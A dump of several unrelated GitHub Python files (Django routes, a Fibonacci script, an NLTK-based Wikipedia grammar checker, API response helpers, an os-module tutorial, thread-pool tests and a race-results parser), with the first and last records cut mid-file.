[\n path('create/date/', views.DateCreateView.as_view()),\n path('create/period/', views.PeriodCreateView.as_view()),\n path('create/order/', views.OrderCreateView.as_view()),\n path('order////', views.OrderView.as_view()),\n path('dates/', views.DateListView.as_view()),\n path('date//', views.DateView.as_view()),\n path('periods/', views.PeriodListView.as_view()),\n path('period//', views.PeriodView.as_view()),\n path('create/card/', views.ClientCardCreateView.as_view()),\n path('create/card_item/', views.CardItemCreateView.as_view()),\n path('card/all/', views.ClientCardsListView.as_view()),\n path('card//', views.ClientCardListView.as_view()),\n path('card/activate//', views.CardActivateView.as_view()),\n path('card_items/all/', views.CardItemListView.as_view()),\n path('create/basket/', views.BasketCreateView.as_view()),\n #path('basket//', views.BasketListView.as_view()),\n path('basket/', views.BasketListView.as_view()),\n path('basket/all/', views.BasketOnlyIdView.as_view()),\n path('basket/del//', views.BasketDeleteView.as_view()),\n\n url(r'^email/(?P[\\w.%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4})/', ordersapp.send_email_with_attach)\n\n #path('basket/last//', views.BasketLastListView.as_view()),\n]","repo_name":"spoliv/FitClubBot","sub_path":"fitclub/ordersapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70874688253","text":"termo = int(input('Digite um termo: '))\nc = 0\nt = 0\nwhile c!= termo:\n c = c + 1\n t = t + 1\n x = (1.618034)**t - (1-1.618034)**t\n raiz = 5**0.5\n fibo = x / raiz\n print(round(fibo), end='> ')\nprint('\\nO termo {} de fibonacci é: {} '.format(termo,round(fibo)))\n\n","repo_name":"eduardofmarcos/Python","sub_path":"56 - fibonacci_c_formula.py","file_name":"56 - fibonacci_c_formula.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3710128120","text":"# Encyclopedia style rules:\n# * Implied you not allowed?\n# * Abbreviation rules\n# * Punctuation rules\n# \" not '\n# terminal punctuation and quotes\n# comma style (Oxford comma mandatory!)\n\n\n# Use cases:\n# * Suggest edits for a specific article\n# * Command line from file\n# * Command line from Wikipedia API\n# * JavaScript\n# * Report on theory of English grammar\n\n\nimport mysql.connector\nimport nltk\nimport re\nimport stopit\nimport sys\nimport time\nfrom english_grammar import (enwiktionary_cat_to_pos,\n phrase_structures,\n closed_lexicon,\n vocab_overrides)\nfrom pywikibot import Page, Site\nfrom wikitext_util import wikitext_to_plaintext, get_main_body_wikitext, blockquote_re\n\n\nmysql_connection = mysql.connector.connect(user='beland',\n host='127.0.0.1',\n database='enwiktionary')\n\n\n# TODO: Use this for visualization. Would be interesting to see\n# curves for articles rated Featured, A, B, Good, C, Start, Stub, etc.\ndef generate_stats(plaintext):\n print(\"sentences per paragraph\\twords per paragraph\\tmax words per paragraph\")\n paragraphs = plaintext.split(\"\\n\")\n for paragraph in paragraphs:\n words_in_paragraph = nltk.word_tokenize(paragraph)\n if len(words_in_paragraph) == 0:\n continue\n\n sentences = nltk.sent_tokenize(paragraph)\n max_words_per_sentence = 0\n for sentence in sentences:\n words = nltk.word_tokenize(sentence)\n if len(words) > max_words_per_sentence:\n max_words_per_sentence = len(words)\n\n print(\"%s\\t%s\\t%s\" % (len(sentences), len(words_in_paragraph), max_words_per_sentence))\n\n\n# https://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style/Dates_and_numbers#Numbers\n# Includes integers, decimal fractions, ratios\nnumber_pattern = r\"(\\d+|\\d+.\\d+|\\d+:\\d)\"\nconforming_number_re = re.compile(r\"^%s$\" % number_pattern)\nordinal_re = re.compile(r\"^\\d*(1st|2nd|3rd|4th|5th|6th|7th|8th|9th|0th)$\")\n\n# https://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style/Dates_and_numbers#Currencies_and_monetary_values\ncurrency_pattern = \"|\".join(closed_lexicon[\"CUR\"])\ncurrency_pattern = currency_pattern.replace(\"$\", \"\\\\$\")\nconforming_currency_re = re.compile(\"^(%s)%s(M|bn)?$\" % (currency_pattern, number_pattern))\n# M for million, bn for billion per\n# https://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style/Dates_and_numbers#Currencies_and_monetary_values\n\n# Must be an integer\nSENTENCE_TIMEOUT_SEC = 1\n\n\nrepair_dot_re = re.compile(r\"([A-Z]\\.[A-Z]$)|(^[A-Z]$)\")\n\n\ndef repair_tokenization(words_in):\n # Fix \"i.e.\", \"R.E.M.\", etc.\n words_out = []\n for word in words_in:\n # No word to append to\n if not words_out:\n words_out.append(word)\n continue\n\n if word == \".\" and repair_dot_re.search(words_out[-1]):\n words_out[-1] += word\n continue\n\n words_out.append(word)\n\n return words_out\n\n\ndef check_english(wikitext, title):\n # Output is to stdout with tab-separated fields:\n # * Type of message\n # S = spelling problem\n # G = grammar problem\n # L = length issues\n # U = Unsupported construct\n # ! = parse failure\n # * Article title\n # * Message\n # * Details\n\n # if (TODO: CONSOLIDATE WITH moss_spell_check.py):\n # print(\"!\\tArticle parse broken?\\t%s\" % title)\n # return\n\n # TODO: Block equations can be introduced with lines like \"Then\"\n # or \"Maxwell's laws are\" and lots of different variations.\n if \"\" in wikitext:\n print(f\"U\\t{title}\\t detected, skipping article\")\n return\n\n if \"#REDIRECT\" in wikitext:\n print(f\"U\\t{title}\\tRedirect detected, skipping article\")\n return\n\n # Ignore bad grammar in quotations and poems\n wikitext = blockquote_re.sub(\"✂\", wikitext)\n\n plaintext = get_main_body_wikitext(wikitext_to_plaintext(wikitext), strong=True)\n sentences = []\n\n # Tokenizing paragraphs individually helps prevent NLTK from\n # getting confused by some situations, like list items.\n paragraphs = plaintext.split(\"\\n\")\n for paragraph in paragraphs:\n words_in_paragraph = nltk.word_tokenize(paragraph)\n if len(words_in_paragraph) > 500:\n print(\"L\\t%s\\tOverly long paragraph?\\t%s words\\t%s\" % (title, len(words_in_paragraph), paragraph))\n\n sentences.extend(nltk.sent_tokenize(paragraph))\n\n # Parse the short sentences first since they should be\n # easiest.\n sentences.sort(key=lambda s: len(s))\n\n for sentence in sentences:\n start_time = time.time()\n\n if \"✂\" in sentence:\n # These represent suppressions (hiding things from spell\n # check and grammar check) during the transformation from\n # wikitext, such as templates and quotations.\n\n # TODO: Handle quote marks\n # * They can replace any part of speech, if they parse as that\n # part of speech themselves.\n # * They can contain novel words and errors.\n # * They can be a literal quotation with a \"said\"\n # construction, in which case they don't need to be any\n # particular part of speech. (Though maybe they are usually\n # full sentences, unless it's someone blurting out a partial\n # utterance?)\n print(\"U\\t%s\\tSuppression detected, skipping sentence\\t%s\" % (title, sentence))\n continue\n\n words = nltk.word_tokenize(sentence)\n words = repair_tokenization(words)\n if len(words) > 200:\n print(\"L\\t%s\\tOverly long sentence?\\t%s words\\t%s\" % (title, len(words), sentence))\n continue\n\n if len(words) > 15:\n print(\"U\\t%s\\t%s words, skipping sentence\\t%s\" % (title, len(words), sentence))\n continue\n\n (grammar_string, word_to_pos) = load_grammar_for_word_list(words)\n is_grammatical = None\n with stopit.SignalTimeout(SENTENCE_TIMEOUT_SEC, swallow_exc=True) as timeout_result:\n is_grammatical = is_sentence_grammatical_beland(words, word_to_pos, title, sentence, grammar_string)\n\n elapsed = time.time() - start_time\n\n if timeout_result.state == timeout_result.TIMED_OUT:\n print(\"T\\t%s\\t%s\\tTIMEOUT\\t%s\" % (elapsed, title, sentence))\n continue\n\n elapsed = time.time() - start_time\n if is_grammatical:\n print(\"Y\\t%s\\t%s\\tYay, parsed sentence successfully!\\t%s\" % (elapsed, title, sentence))\n else:\n print(\"G\\t%s\\t%s\\tUngrammatical sentence?\\t%s\" % (elapsed, title, sentence))\n\n\ndef is_sentence_grammatical_beland(word_list, word_to_pos, title, sentence, grammar_string):\n\n word_train = []\n\n previous_word = None\n for word in word_list:\n expand_grammar = False\n pos_list = word_to_pos.get(word, [])\n\n # Not requiring pos_list be empty because \"Such\" is a proper\n # noun but we need to look up \"such\"\n if previous_word is None and word == word.title():\n tmp_pos_list = word_to_pos.get(word.lower())\n if tmp_pos_list:\n # So that CFG parser can do the POS lookup\n word_list[0] = word.lower()\n pos_list.extend(tmp_pos_list)\n if not pos_list and conforming_number_re.match(word):\n pos_list = [\"NUM\"]\n expand_grammar = True\n if not pos_list and ordinal_re.match(word):\n pos_list = [\"ORD\"]\n expand_grammar = True\n if not pos_list and conforming_currency_re.match(word):\n pos_list = [\"CURNUM\"]\n expand_grammar = True\n if not pos_list and word.isalnum() and word[0].isalpha() and (word[0] == word[0].upper()):\n # Assume all capitalized words and acronyms (allowing some numbers sprinkled in) are proper nouns\n # Including Chris, NASA, GmbH, A380\n pos_list = [\"N\"]\n expand_grammar = True\n if not pos_list and (word == \"'\" and previous_word[-1].lower() == \"s\") or word == \"'s\":\n pos_list = [\"POSS\"]\n expand_grammar = True\n if \"-\" in word:\n word_parts = word.split(\"-\")\n pos_patterns = []\n for part in word_parts:\n tmp_pos_list = word_to_pos.get(part)\n if not tmp_pos_list:\n tmp_pos_list = word_to_pos.get(part.lower())\n if tmp_pos_list:\n pos_patterns.append(tmp_pos_list)\n else:\n break\n if len(pos_patterns) == len(word_parts) and len(word_parts) == 2:\n if \"ADJ\" in pos_patterns[0] and \"N\" in pos_patterns[1]:\n # e.g. \"blue-hull\"\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"NUM\" in pos_patterns[0] and \"N\" in pos_patterns[1]:\n # e.g. \"two-hull\"\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"ADJ\" in pos_patterns[0] and \"ADJ\" in pos_patterns[1]:\n # e.g. \"blue-grey\"\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif word_parts[0].isnumeric() and \"N\" in pos_patterns[1]:\n # e.g. 15-year\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"ADJ\" in pos_patterns[0] and \"V\" in pos_patterns[1] and word_parts[1][-1] == \"d\":\n # e.g. Saudi-led\n # -d is a cheesy way to look for past tense verbs only\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif \"N\" in pos_patterns[0] and \"V\" in pos_patterns[1] and word_parts[1][-1] == \"d\":\n # e.g. hickory-smoked\n # -d is a cheesy way to look for past tense verbs only\n pos_list = [\"ADJ\"]\n expand_grammar = True\n elif word_parts[0].lower() == \"sub\":\n # e.g. sub-contract\n pos_list = pos_patterns[1]\n expand_grammar = True\n elif word_parts[0].lower() == \"co\":\n # e.g. co-founders, co-founded\n pos_list = pos_patterns[1]\n expand_grammar = True\n elif word_parts[0].lower() == \"non\":\n # e.g. non-aggression, non-blue\n pos_list = pos_patterns[1]\n expand_grammar = True\n elif word_parts[1].lower() == \"class\":\n # e.g. Washington-class\n pos_list = \"ADJ\"\n expand_grammar = True\n\n if not pos_list:\n print(\"S\\t%s\\t%s\\tNo POS for word\\t%s\" % (word, title, word_list))\n return True\n\n if expand_grammar:\n word_to_pos[word] = pos_list\n for pos in pos_list:\n grammar_string += '%s -> \"%s\"\\n' % (pos, word)\n\n word_train.append((word, pos_list))\n previous_word = word\n\n print(\"DEBUG\\t%s\" % word_train)\n\n grammar = nltk.CFG.fromstring(grammar_string)\n\n # parser = nltk.parse.RecursiveDescentParser(grammar) # Cannot handle X -> X Y (infinite loop)\n # parser.trace(5)\n # parser = nltk.parse.LeftCornerChartParser(grammar)\n parser = nltk.parse.BottomUpLeftCornerChartParser(grammar)\n # Parsers background: http://www.nltk.org/book/ch08.html\n # Other parsers are available in nltk.parse\n\n # print(grammar)\n\n try:\n possible_parses = parser.parse(word_list)\n except Exception as e:\n print(e)\n return False\n\n seen = []\n possible_parses_dedup = []\n for parse in possible_parses:\n serialized = parse.pformat()\n if serialized in seen:\n print(\"!\\tDROPPED DUP!\")\n continue\n else:\n possible_parses_dedup.append(parse)\n seen.append(serialized)\n # parse_dummies = [parse.pretty_print() for parse in possible_parses_dedup]\n parse_dummies = [parse for parse in possible_parses_dedup]\n if len(parse_dummies) == 0:\n print(\"DEBUG\\t%s\" % word_train)\n return False\n return True\n\n\ndef is_sentence_grammatical_nltk(word_list):\n # \"word_list\" instead of sentence avoids re-tokenizing\n\n tagged = nltk.pos_tag(word_list)\n print(tagged)\n return True\n\n\ndef fetch_article_wikitext(title):\n site = Site()\n page = Page(site, title=title)\n return page.text\n\n\ndef fetch_article_plaintext(title):\n site = Site()\n page = Page(site, title=title)\n plaintext = wikitext_to_plaintext(page.text)\n return get_main_body_wikitext(plaintext, strong=True)\n\n\n# TODO: For later command-line use\ndef check_article(title):\n wikitext = fetch_article_wikitext(title)\n check_english(wikitext, title)\n\n\n# BOOTSTRAPPING\n\n# A quasi-representative sample of topics (for positive testing) from\n# well-written articles listed at:\n# https://en.wikipedia.org/wiki/Wikipedia:Featured_articles\n\nsample_featured_articles = [\n\n # DEBUGGING FILES\n\n # \"0test\",\n\n # FEATURED ARTICLES\n\n \"BAE Systems\",\n \"Evolution\",\n \"Chicago Board of Trade Building\",\n \"ROT13\",\n \"Periodic table\",\n \"Everything Tastes Better with Bacon\",\n \"Renewable energy in Scotland\",\n \"Pigeon photography\",\n \"University of California, Riverside\",\n \"Same-sex marriage in Spain\",\n \"Irish phonology\",\n \"Sentence spacing\",\n # https://en.wikipedia.org/wiki/X%C3%A1_L%E1%BB%A3i_Pagoda_raids\n \"Xá Lợi Pagoda raids\",\n \"Flag of Japan\",\n \"Cerebellum\",\n # https://en.wikipedia.org/wiki/L%C5%8D%CA%BBihi_Seamount\n \"Lōʻihi Seamount\",\n \"India\",\n \"To Kill a Mockingbird\",\n \"Edward VIII abdication crisis\",\n # https://en.wikipedia.org/wiki/W%C5%82adys%C5%82aw_II_Jagie%C5%82%C5%82o\n \"Władysław II Jagiełło\",\n \"Atheism\",\n \"Liberal Movement (Australia)\",\n \"Europa (moon)\",\n \"Philosophy of mind\",\n \"R.E.M.\",\n \"Tornado\",\n \"The Hitchhiker's Guide to the Galaxy (radio series)\",\n \"Pi\",\n \"Byzantine navy\",\n \"Wii\",\n \"Mass Rapid Transit (Singapore)\",\n \"History of American football\",\n\n # ARTICLES NEEDING COPYEDIT\n \"Gender inequality in China\"\n]\n\n\ndef check_samples_from_disk():\n for title in sample_featured_articles:\n title_safe = title.replace(\" \", \"_\")\n with open(\"samples/%s\" % title_safe, \"r\") as text_file:\n wikitext = text_file.read()\n check_english(wikitext, title)\n # generate_stats(plaintext)\n\n\ndef save_sample_articles():\n for title in sample_featured_articles:\n wikitext = fetch_article_wikitext(title)\n title_safe = title.replace(\" \", \"_\")\n with open(\"samples/%s\" % title_safe, \"w\") as text_file:\n text_file.write(wikitext)\n\n\n# --- GRAMMAR-MAKING HACK ---\n\n\ndef fetch_parts_of_speech(word):\n # Returns a LIST of parts of speech\n word_categories = fetch_categories(word)\n pos_list = [enwiktionary_cat_to_pos.get(category_name) for category_name in word_categories]\n return [pos for pos in pos_list if pos]\n\n\ndef fetch_categories(word):\n if not word:\n return []\n cursor = mysql_connection.cursor()\n cursor.execute(\"SELECT title, category_name FROM page_categories WHERE title=%s\", (word, ))\n\n # Account for SQL being case-insensitive\n result = [cat.decode('utf8') for (title, cat) in cursor if title.decode('utf8') == word]\n cursor.close()\n return result\n\n\ndef load_grammar_for_word_list(word_list):\n grammar_string = \"\"\n\n # ---\n\n # Load relationships between parts of speech\n\n for (parent_pos, child_structures) in sorted(phrase_structures.items()):\n alternatives = []\n for child_list in child_structures:\n # Strip attributes for now\n child_list = [child.split(\"+\")[0] for child in child_list]\n alternatives.append(\" \".join(child_list))\n grammar_string += \"%s -> %s\\n\" % (parent_pos, \" | \".join(alternatives))\n\n # ---\n\n # Load limited vocabulary (only for words in this text, to\n # minimize the size of the grammar).\n\n word_set = set(word_list)\n\n # Deal with the possibility that some words are only capitalized\n # because they begin a sentence. No harm here in loading a few\n # lowercase variants we won't actually use later.\n more_words = set()\n for word in word_set:\n if word == word.title():\n more_words.add(word.lower())\n if \"-\" in word:\n [more_words.add(part) for part in word.split(\"-\")]\n [more_words.add(part.lower()) for part in word.split(\"-\")]\n word_set = word_set.union(more_words)\n\n word_to_pos = {}\n for word in word_set:\n word_pos_set = set()\n\n if word in vocab_overrides:\n word_pos_set = vocab_overrides[word]\n else:\n [word_pos_set.add(pos) for pos in fetch_parts_of_speech(word)]\n\n if word_pos_set:\n word_to_pos[word] = list(word_pos_set)\n\n for pos in word_pos_set:\n grammar_string += '%s -> \"%s\"\\n' % (pos, word)\n\n # ---\n\n # Load closed-class vocabulary explicity set by\n # english_grammar.py.\n\n # TODO: This is probably unnecessary; Wiktionary almost certainly\n # has these listed. These are currently adding to the grammar, not\n # overriding Wiktionary, so it's unclear if the attributes are\n # going to come through at the other end. (They're currently\n # unused anyway, but that could change.)\n\n for (pos, word_list) in closed_lexicon.items():\n pos = pos.split(\"+\")[0]\n for word in word_list:\n grammar_string += '%s -> \"%s\"\\n' % (pos, word)\n\n pos_list = word_to_pos.get(word, [])\n pos_list.append(pos)\n word_to_pos[word] = pos_list\n\n return (grammar_string, word_to_pos)\n\n\n# --- RUNTIME ---\n\ndef run_grammar_check():\n if len(sys.argv) > 1 and sys.argv[1] == \"--download\":\n save_sample_articles()\n exit(0)\n\n check_samples_from_disk()\n mysql_connection.close()\n\n\nif __name__ == '__main__':\n run_grammar_check()\n","repo_name":"cdbeland/moss","sub_path":"grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":18256,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"33679700511","text":"import requests\nimport json\nimport sys\nimport os\nimport logging\n\ndef ProcessBool(myBool):\n if(str(type(myBool)) == \"\"):\n if(myBool in ['True','true','t','yes']):\n return True\n if(myBool in ['False','false','f','no']):\n return False\n else:\n return myBool\n\ndef isAnomalousHtmlResponse(text):\n if(\"\" in text):\n return True\n else:\n return False\n\ndef processAPIResponse(response):\n if(response.status_code >= 300):\n if(response.status_code == 500):\n logging.debug(\"CR API Error: {} - Hint: {} - Message: {}\".format(response.status_code, \"Try logging back in.\",response.text))\n print(\"CR API Error: {} - Hint: {} - Message: {}\".format(response.status_code, \"Try logging back in.\",response.text))\n #print(\"API Error Code: \"+str(response.status_code))\n return False\n else:\n logging.debug(\"CR API Error: {} - Message: {}\".format(response.status_code,response.text))\n print(\"CR API Error: {} - Message: {}\".format(response.status_code,response.text))\n #print(\"API Error Code: \"+str(response.status_code))\n return False\n else:\n RespContent = str(response.text)\n if(RespContent.startswith(\"\")):\n logging.debug(\"CR API Error: {} - Message: {}\".format(response.status_code,\"Response received is in HTML Format\"))\n print(\"CR API Error: {} - Message: {}\".format(response.status_code,\"Response received is in HTML Format\"))\n return False\n else:\n return True\n\ndef ProcessStdResponse(res,CsvOutput):\n CsvOutput = ProcessBool(CsvOutput)\n if isAnomalousHtmlResponse(res.text):\n print(\"Error: You need to log back in.\")\n exit(1)\n if(res.status_code >= 400):\n\n print(\"Error Code: \"+str(res.status_code))\n try:\n result = json.loads(res.text)\n if result['message']:\n print(\"Error Message: \"+result['details'])\n return True,None\n except:\n return True,None\n\n return True,None\n\n else:\n try:\n return False,CsvOutput\n except:\n print(\"Unknown Error.\")\n return True,None\n","repo_name":"brendanSapience/Automation-Anywhere-Control-Room-Command-Line-Interface","sub_path":"responses/StdResponses.py","file_name":"StdResponses.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27466080198","text":"import os\r\n\r\n# Getting Current Directory\r\n# We use the getcwd() function of the os module to get the path to the current directory.\r\ncurrent_dir = os.getcwd()\r\nprint(current_dir)\r\nos.rmdir(\"OS\")\r\n# When you run the code, the current working directory that is the directory containing our Python file is printed.\r\n\"\"\"\r\n# Changing Directory\r\n# In Python, we can change the current working directory by using the chdir() function of the os module.\r\n# As we saw previously, the present working directory is the directory containing our Python file. \r\n# Let's change the current working directory\r\ncurrent_dir = os.getcwd()\r\nprint(current_dir)\r\nos.chdir(\"/path/new/location\") # i.e. C:/Users/Danish Khan/PycharmProjects/Python/Example\r\nprint(os.getcwd())\r\n# \r\n# \r\n# Note: Now if we create a file inside the current directory, our file will be created inside .\r\ncurrent_dir = os.getcwd()\r\nprint(current_dir)\r\nos.chdir(\"\")\r\nwith open(\"test.txt\", \"w\") as f:\r\n f.write(\"This is a test file.\")\r\n# We can see the test.txt file is created inside the current working directory which is .\r\n\r\n# Listing all Directories and Files\r\n# All files and subdirectories inside a directory can be retrieved using the listdir() function of the os module.\r\nprint(os.listdir('path or it will print current directory files')) \r\n# This function returns a list containing all files and subdirectories in the current working directory.\r\n# We can also pass an optional path argument to listdir() to return files and subdirectories from a specific path.\r\nprint(os.listdir(\"\"))\r\n\r\n# Making a New Directory\r\n# We can create a new directory using the mkdir() function of the os module.\r\nos.mkdir(\"test\")\r\n# This creates a new test directory in our current directory.\r\n\r\n# Renaming a Directory or a File\r\n# We can rename any directory or file using the os.rename() function which takes in 2 arguments: old name and new name.\r\n# rename directory or file\r\nos.rename('', '')\r\n\r\n# Removing Directory or File\r\n# We can remove a file using the remove() function of the os module.\r\nprint(os.listdir())\r\nos.remove(\"\")\r\nprint(os.listdir())\r\n# After running this code, the file is deleted, so the second os.listdir() will not list the file.\r\n\r\n# To remove a directory, we use the rmdir() function.\r\nprint(os.listdir())\r\nos.rmdir(\"\")\r\nprint(os.listdir())\r\n# Note: One thing we need to remember when removing a directory is that the directory must be empty. Otherwise,\r\n# an exception will be raised.\r\n\"\"\"","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Operating System Modules.py","file_name":"Operating System Modules.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"37659539301","text":"import os\nimport threading\nimport time\n\nimport pytest\n\nfrom threadedprocess import ThreadedProcessPoolExecutor\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\n\ndef _get_pid_and_tid():\n return (os.getpid(), threading.current_thread().ident)\n\n\ndef _long_running_task(*_):\n start = time.time()\n time.sleep(1)\n end = time.time()\n return (start, end)\n\n\ndef _return_True():\n return True\n\n\ndef _raise_ValueError():\n raise ValueError\n\n\ndef test_futures_run_in_different_processes_and_threads():\n \"\"\"\n Check that all spawned processes and threads are used to run the submitted\n tasks.\n\n \"\"\"\n futures = []\n\n with ThreadedProcessPoolExecutor(max_processes=4,\n max_threads=4) as executor:\n for i in range(1000):\n futures.append(executor.submit(_get_pid_and_tid))\n\n pids_and_tids = set((f.result() for f in futures))\n\n assert len(pids_and_tids) == 16 # 4 processes, 4 threads\n\n\ndef test_results_return():\n with ThreadedProcessPoolExecutor() as executor:\n f = executor.submit(_return_True)\n\n assert f.result() is True\n\n\ndef test_exceptions_raises():\n with ThreadedProcessPoolExecutor() as executor:\n f = executor.submit(_raise_ValueError)\n\n with pytest.raises(ValueError):\n assert f.result()\n\n\n@pytest.mark.parametrize(\"EXECUTOR\", [\n ProcessPoolExecutor(max_workers=16),\n ThreadPoolExecutor(max_workers=16),\n ThreadedProcessPoolExecutor(max_processes=4, max_threads=4)\n])\ndef test_all_futures_execute_in_parallel_if_possible(EXECUTOR):\n \"\"\"\n If the number of tasks submitted to the executor is lower than the number\n of workers the executor has, all the tasks should run concurrently (given\n the task running time is not too short).\n\n 0....1....2....3....4....5....6....7\n # DO OVERLAP\n A-----------------B\n A----B\n A----B\n A----B\n\n # DON'T OVERLAP\n A-----------------B\n A---B\n A----B\n A----B\n\n \"\"\"\n futures = []\n\n with EXECUTOR as executor:\n for i in range(16):\n futures.append(executor.submit(_long_running_task))\n\n times = [f.result() for f in futures]\n As, Bs = [t[0] for t in times], [t[1] for t in times]\n\n assert min(Bs) >= max(As)\n","repo_name":"nilp0inter/threadedprocess","sub_path":"test_threadedprocess.py","file_name":"test_threadedprocess.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"24490359292","text":"import os\nfrom dataclasses import dataclass\nimport datetime\n\nfrom modules.exceptions import *\n\n\ndata_files = {\n \"start\": \"start.log\",\n \"end\": \"end.log\",\n \"abbreviation\": \"abbreviations.txt\"\n}\nerror_log_path = os.path.join(os.path.dirname(__file__), '../ErrorLogs/error_log.txt')\nprint(__file__)\n\n\n@dataclass()\nclass RacerInfo:\n abbreviation: str = None\n racer: str = None\n team: str = None\n start: datetime = None\n finish: datetime = None\n\n @property\n def best_lap_time(self):\n if self.start is None or self.finish is None:\n return None\n return self.finish - self.start\n\n\ndef check_if_files_exists(data_folder_path: str) -> bool:\n assert type(data_folder_path) == str\n for filename in data_files.values():\n if not os.path.isfile(os.path.join(data_folder_path, filename)):\n raise FileDoesNotExistError(f\"File {filename} is not found\")\n return True\n\n\ndef make_path_to_files(data_folder_path: str) -> list:\n assert type(data_folder_path) == str\n if check_if_files_exists(data_folder_path):\n start_file_path = os.path.join(data_folder_path, data_files[\"start\"])\n end_file_path = os.path.join(data_folder_path, data_files[\"end\"])\n abbreviation_file_path = os.path.join(data_folder_path, data_files[\"abbreviation\"])\n path_list = [start_file_path, end_file_path, abbreviation_file_path]\n for path in path_list:\n if not os.path.exists(path):\n raise FileDoesNotExistError(f\"{path} does not exist\")\n assert type(path_list) == list\n return path_list\n raise FileNotFoundError(\"No such file or directory\")\n\n\ndef get_racer_abbreviation(raw_abbr_string: str):\n assert type(raw_abbr_string) == str\n abbr = raw_abbr_string[:3]\n if not abbr.isalpha():\n raise AbbreviationStringFormatError\n return abbr\n\n\ndef get_datetime(raw_string: str) -> datetime.datetime:\n assert type(raw_string) == str\n try:\n datetime_obj = datetime.datetime.strptime(raw_string[3:].strip(), '%Y-%m-%d_%H:%M:%S.%f')\n except ValueError:\n raise ParseDateError\n assert type(datetime_obj) == datetime.datetime\n return datetime_obj\n\n\ndef create_log_with_abbr_team_name(abbreviation_data_path: str):\n assert type(abbreviation_data_path) == str\n\n log = {}\n try:\n with open(abbreviation_data_path) as f:\n content = f.readlines()\n for line in content:\n line = line.strip()\n try:\n abbreviation, name, team = line.split(\"_\")\n except ValueError:\n raise StringFormatError\n log[abbreviation] = RacerInfo(abbreviation=abbreviation, racer=name, team=team)\n except FileNotFoundError:\n raise FileDoesNotExistError(f\"Filepath is incorrect: {abbreviation_data_path}\")\n assert type(log) == dict\n return log\n\n\ndef add_timestamp(path: str, log: dict):\n assert type(path) == str\n assert type(log) == dict\n\n log_to_add_timestamp = log\n\n try:\n with open(path) as f:\n content = f.readlines()\n for line in content:\n for key in log_to_add_timestamp.keys():\n if line.startswith(key):\n if 'start' in path:\n log_to_add_timestamp[key].start = get_datetime(line)\n elif 'end' in path:\n log_to_add_timestamp[key].finish = get_datetime(line)\n else:\n raise WrongDataFileError\n except FileNotFoundError:\n raise FileDoesNotExistError(f\"Filepath is incorrect: {path}\")\n assert type(log_to_add_timestamp)\n return log_to_add_timestamp\n\n\ndef make_log(data_folder_path: str) -> dict:\n assert type(data_folder_path) == str\n\n path_list = make_path_to_files(data_folder_path)\n\n for path in path_list:\n assert type(path) == str\n\n try:\n start_data_path, finish_data_path, abbreviation_data_path = path_list\n log = create_log_with_abbr_team_name(abbreviation_data_path)\n log = add_timestamp(start_data_path, log)\n log = add_timestamp(finish_data_path, log)\n except FileNotFoundError:\n raise WrongFilePathError\n\n assert type(log) == dict\n return log\n\n\ndef make_error_log_string(racer_log: RacerInfo) -> str:\n assert type(racer_log) == RacerInfo\n assert racer_log.racer is not None\n assert racer_log.start is not None\n assert racer_log.finish is not None\n\n error_str = f\"{racer_log.racer} race time is incorrect — finish {racer_log.finish} before start {racer_log.start}\\n\"\n assert type(error_str) == str\n return error_str\n\n\ndef make_error_log_file(log_dict: dict):\n assert type(log_dict) == dict\n with open(error_log_path, 'w') as f:\n for key in log_dict.keys():\n if log_dict[key].best_lap_time.days < 0:\n f.write(make_error_log_string(log_dict[key]))\n\n\ndef print_error_log(error_path: str):\n assert type(error_path) == str\n if os.path.exists(error_path):\n print(\"------------------------------------------------------------------------\")\n with open(error_path) as f:\n content = f.readlines()\n for line in content:\n print(line.strip())\n else:\n raise FileDoesNotExistError(\"Error log file does not exist\")\n\n\ndef delete_log_notes_with_error(log: dict) -> dict:\n assert type(log) == dict\n key_list = list(log.keys())\n for key in key_list:\n if log[key].best_lap_time.days < 0:\n del log[key]\n assert type(log) == dict\n return log\n\n\ndef make_one_racer_info(name: str, log: list) -> str:\n assert type(name) == str\n assert type(log) == list\n\n for racer, team, race_time in log:\n if racer == name:\n info_str = f\"{racer:30}| {team:35}| {race_time:11}\"\n assert type(info_str) == str\n return info_str\n try:\n with open(error_log_path) as f:\n for line in f:\n if name in line:\n info_str = line.strip()\n return info_str\n except FileNotFoundError:\n raise FileDoesNotExistError(\"Error log file does not exist\")\n raise WrongDriverName(\"This driver did not participate in the race\")\n\n\ndef format_report(log: dict) -> list:\n assert type(log) == dict\n formatted_report = []\n for val in log.values():\n formatted_report.append([val.racer, val.team, str(val.best_lap_time)[:-3]])\n print(formatted_report)\n assert type(formatted_report) == list\n return formatted_report\n\n\ndef sorted_log(formatted_report: list, order: str) -> list:\n assert type(formatted_report) == list\n assert order in (\"asc\", \"desc\")\n sorted_report = sorted(formatted_report, key=lambda x: x[2], reverse=False)\n\n race_log_list = []\n counter = 1\n for racer, team, race_time in sorted_report:\n one_racer_result = f'{counter:3}. {racer:30}| {team:35}| {race_time:11}'\n race_log_list.append(one_racer_result)\n counter += 1\n if len(race_log_list) > 15:\n race_log_list.insert(15, \"------------------------------------------------------------------------\")\n if order == 'desc':\n race_log_list.reverse()\n assert type(race_log_list) == list\n return 